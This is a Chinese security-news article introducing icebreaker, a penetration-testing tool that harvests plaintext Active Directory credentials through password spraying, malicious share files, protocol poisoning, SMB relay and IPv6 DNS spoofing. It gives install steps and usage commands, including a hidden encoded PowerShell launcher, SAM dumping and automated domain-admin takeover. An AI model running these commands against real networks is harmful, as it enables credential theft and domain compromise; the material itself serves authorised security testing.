如何使用icebreaker在外部环境中获取活动目录明文凭证
2023-3-2 19:3:34 Author: FreeBuf(查看原文) 阅读量:9 收藏

 关于icebreaker 

icebreaker是一款针对活动目录凭证安全的研究工具,在该工具的帮助下,广大研究人员能够在活动目录环境之外(但在内部网络中)获取目标活动目录的明文凭证。

该工具会对目标活动目录以自动化的方式进行五次内部渗透测试,并尝试获取明文凭证。除此之外,我们还可以使用--auto选项来以自动化的形式获取域管理员权限。

 工具运行机制 

1、反向爆破:自动获取用户名列表,并使用两个最常用的活动目录密码测试每个用户名(两次以上的尝试可能会触发帐户锁定策略);

2、上传网络共享:通过将恶意文件上传到可用网络共享来捕获用户的密码;

3、渗透广播网络协议:使用常见的网络协议欺骗用户的计算机向我们发送密码;

4、中间人SMB连接:对活动目录计算机执行远程命令以收集密码;

5、渗透IPv6 DNS:利用DNS欺骗活动目录计算机将其用户密码发送给我们;

 工具安装 

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/DanMcInerney/icebreaker.git

(向右滑动,查看更多)

接下来,我们需要以root权限执行下列命令以安装icebreaker:

./setup.shpipenv install --threepipenv shell

如果安装出问题的话,请将pipenv更新到最新版本:

apt-get remove python-pipenv && python setup.py install

(向右滑动,查看更多)

Docker安装

我们还可以通过Docker来使用icebreaker,安装命令如下:

docker build --rm -t danmcinerney/icebreaker .docker run danmcinery/icebreaker

 工具使用 

以root权限运行,并从一个IP地址列表(单个IP或CIDR范围)中读取目标:

./icebreaker -l targets.txt -c "powershell -nop -w hidden -exec bypass -enc WwFk..."

(向右滑动,查看更多)

从主机列表中读取,告诉Responder使用eth0接口而不是默认网关接口,让Responder运行30m而不是通常的10m,并运行默认的ntlmrelayx命令以将SAM转储到目标服务器:

./icebreaker -l targets.txt -i eth0 -t 30 -c default

(向右滑动,查看更多)

使用一个Nmap XML输出文件,跳过所有五次攻击,并为反向爆破使用自定义密码列表:

./icebreaker.py -x nmapscan.xml -s rid,scf,llmnr,relay,dns,crack -p /home/user/password-list.txt

(向右滑动,查看更多)

用后即弃方法:

输入目标文件,抓取companydomain.com以获取要添加到反向爆破中的电子邮件用户名,跳过mitm6的IPv6 DNS投毒,并在攻击4开始后在tmux或xterm窗口中运行Empire和DeathStar以获得自动域管理:

./icebreaker.py -l targets.txt -d companydomain.com -s dns --auto [tmux/xterm]

(向右滑动,查看更多)

 许可证协议 

本项目的开发与发布遵循MIT开源许可证协议。

 项目地址 

icebreaker

https://github.com/DanMcInerney/icebreaker

参考资料:

https://www.powershellempire.com/

https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

https://github.com/danielmiessler/SecLists/blob/601038eb4ea18c97177b43a757286d3c8a815db8/Passwords/merged.txt.tar.gz

精彩推荐


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651217992&idx=4&sn=72971c471906e432f64facb6722cc1e4&chksm=bd1df2c38a6a7bd505de045ed608b96efed187ac3fab48f9b612beb10e477d63970ef670eb04#rd
如有侵权请联系:admin#unsafe.sh